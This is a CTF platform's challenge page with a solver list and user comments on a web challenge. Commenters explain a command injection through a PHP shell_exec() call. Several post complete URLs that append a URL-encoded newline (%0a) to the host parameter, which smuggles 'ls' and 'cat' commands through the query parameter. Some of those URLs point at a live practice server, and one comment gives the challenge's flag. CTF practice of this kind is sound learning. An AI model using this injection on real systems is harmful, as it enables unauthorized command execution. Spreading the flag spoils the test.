评分(1)
解题动态
luckylian 攻破了该题 1小时前
17335918325 攻破了该题 18小时前
2495280533 攻破了该题 1天前
buuble123 攻破了该题 2天前
18516952839 攻破了该题 4天前
wsmemail 攻破了该题 5天前
渴死的鱼 攻破了该题 6天前
你不懂的吧 攻破了该题 7天前
周围有鬼 攻破了该题 8天前
1345736679 攻破了该题 9天前
百叶i 攻破了该题 13天前
kiku0203 攻破了该题 13天前
abcfdafda123 攻破了该题 14天前
李欣 攻破了该题 15天前
2912700095 攻破了该题 15天前
cs888 攻破了该题 15天前
knowimyourtype 攻破了该题 15天前
奔跑小马 攻破了该题 22天前
Goodboy 攻破了该题 23天前
评论
Kokomi-FIRE 1月前
举报
好像是利用参数拼接命令的玩意儿,得URL编码绕过
MoCaser 4月前
举报
不懂的建议花金币看看wp
000ooo 7月前
举报
①/query.php?host=whois.verisign-grs.com%0a&query=ls ②/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
zzz666 5月前
举报
@cyffk 空格和换行会被url编码
cyffk 7月前
举报
为什么%不会被过滤?
Zhumeng 7月前
举报
查看query源代码发现有个shell_exec()可以rce 通过%0a去截断第一个参数,然后在第二个参数里面输入ls可以查看当前目录文件 然后cat命令读取文件 空格需要url编码
admin9101 9月前
举报
http://82.157.146.43:16777/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
MOCHAOLIN 10月前
举报
(1)http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=ls (2) http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=cat%20thisistheflagwithrandomstuf
wj834722134 11月前
举报
host参数用%0a结尾,正则表达式/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/为什么能匹配成功?host字符串最后一位'\n'明明不在[0-9a-zA-Z\.-]范围内
xwWx 5月前
举报
@TOMCAT336699 x0a 是换行的话大概是 正则表达式只匹配换行之前的字符串
TOMCAT336699 5月前
举报
您弄明白了没有,你这个问题,我没找出答案来,谢谢
Tao23 1年前
举报
query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
to5ny 1年前
举报
/query.php?host=whois.verisign-grs.com%0a&query=ls /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
xzs297995 1年前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}